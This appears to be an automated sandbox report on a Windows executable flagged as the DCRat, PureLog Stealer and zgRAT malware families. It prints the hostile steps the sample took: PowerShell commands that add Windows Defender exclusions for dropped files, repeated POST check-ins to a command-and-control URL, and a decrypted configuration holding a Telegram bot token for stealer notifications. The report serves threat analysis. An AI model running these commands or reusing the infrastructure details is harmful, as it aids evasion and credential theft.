Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ccp3sJPDXs.exe

Overview

General Information

Sample name:Ccp3sJPDXs.exe
renamed because original name is a hash value
Original sample name:3e27b10ac7aa4c46437a300fb3ea5bdf.exe
Analysis ID:1631230
MD5:3e27b10ac7aa4c46437a300fb3ea5bdf
SHA1:12d7c8cc0062c6a3c7c43a798cc372f4550387d2
SHA256:64d47e7c05d73ded8c5e3e88195f1173477e55527ad064aca606ef80fda9a38d
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Ccp3sJPDXs.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\Ccp3sJPDXs.exe" MD5: 3E27B10AC7AA4C46437A300FB3EA5BDF)
    • wscript.exe (PID: 4816 cmdline: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Blockbrowser.exe (PID: 4368 cmdline: "C:\SavesHost/Blockbrowser.exe" MD5: 497FE9F6B69ACEB2358177C4DF4DE1FE)
          • powershell.exe (PID: 6208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7792 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 1988 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4816 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5472 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7600 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7716 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • 8Kh5jgTdnc69SVsXvfN.exe (PID: 7940 cmdline: "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe" MD5: 497FE9F6B69ACEB2358177C4DF4DE1FE)
      • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Ccp3sJPDXs.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Ccp3sJPDXs.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\SavesHost\Blockbrowser.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\SavesHost\Blockbrowser.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Users\user\ZI0Zcb1pDT.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 5 entries
                          SourceRuleDescriptionAuthorStrings
                          0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.Ccp3sJPDXs.exe.70024ca.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\SavesHost/Blockbrowser.exe", ParentImage: C:\SavesHost\Blockbrowser.exe, ParentProcessId: 4368, ParentProcessName: Blockbrowser.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', ProcessId: 6208, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\SavesHost/Blockbrowser.exe", ParentImage: C:\SavesHost\Blockbrowser.exe, ParentProcessId: 4368, ParentProcessName: Blockbrowser.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', ProcessId: 6208, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Ccp3sJPDXs.exe", ParentImage: C:\Users\user\Desktop\Ccp3sJPDXs.exe, ParentProcessId: 4268, ParentProcessName: Ccp3sJPDXs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , ProcessId: 4816, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\SavesHost/Blockbrowser.exe", ParentImage: C:\SavesHost\Blockbrowser.exe, ParentProcessId: 4368, ParentProcessName: Blockbrowser.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', ProcessId: 6208, ProcessName: powershell.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-06T20:21:57.694330+010020480951A Network Trojan was detected192.168.2.549753188.114.96.380TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.phpAvira URL Cloud: Label: malware
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\SnwWbCTA.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\Public\Documents\0ZuAkTjxKX.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\SavesHost\6kXFj.vbeAvira: detection malicious, Label: VBS/Runner.VPA
                                    Source: C:\SavesHost\SgrmBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\JRXzWseY.logAvira: detection malicious, Label: TR/Agent.egqpz
                                    Source: C:\Users\user\Desktop\Opngnglp.logAvira: detection malicious, Label: TR/Agent.jbwuj
                                    Source: C:\Users\user\AppData\Local\Temp\equVSDMYPr.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\SavesHost\Blockbrowser.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\NzeXyGEM.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                                    Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exeReversingLabs: Detection: 73%
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeReversingLabs: Detection: 73%
                                    Source: C:\SavesHost\Blockbrowser.exeReversingLabs: Detection: 73%
                                    Source: C:\SavesHost\SgrmBroker.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\Public\Documents\0ZuAkTjxKX.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Desktop\JRXzWseY.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\Opngnglp.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\OvRyOCaQ.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\TcFfQdBd.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\UQJnCrwb.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\UgLFMzEy.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\XnIOiRzu.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\ZEamenMP.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\apvwEADp.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\bGNUAWQL.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\eOeVwbKg.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\ezcDmTCJ.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\hHZMHlwF.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\lgJkAMCv.logReversingLabs: Detection: 20%
                                    Source: C:\Users\user\Desktop\sCWCXWYE.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\slPjJBeC.logReversingLabs: Detection: 34%
                                    Source: C:\Users\user\Desktop\uaYsybMf.logReversingLabs: Detection: 34%
                                    Source: C:\Users\user\Desktop\unCSekjx.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\ZI0Zcb1pDT.exeReversingLabs: Detection: 73%
                                    Source: Ccp3sJPDXs.exeVirustotal: Detection: 76%Perma Link
                                    Source: Ccp3sJPDXs.exeReversingLabs: Detection: 68%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                    Source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"TelegramNotifer":{"chatid":"6441298966","bottoken":"8105473573:AAFS3hCyzLZYjLCkNjMRTWl8sUp_NMBZ2oU","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"False","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"}}
                                    Source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-3OxsSTgLxBT4yfXwdLEr","0","","1","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: Ccp3sJPDXs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Ccp3sJPDXs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Ccp3sJPDXs.exe
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007DA69B
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007EC220
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007FB348 FindFirstFileExA,0_2_007FB348

                                    Software Vulnerabilities

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49753 -> 188.114.96.3:80
                                    Source: global trafficTCP traffic: 192.168.2.5:60918 -> 162.159.36.2:53
                                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
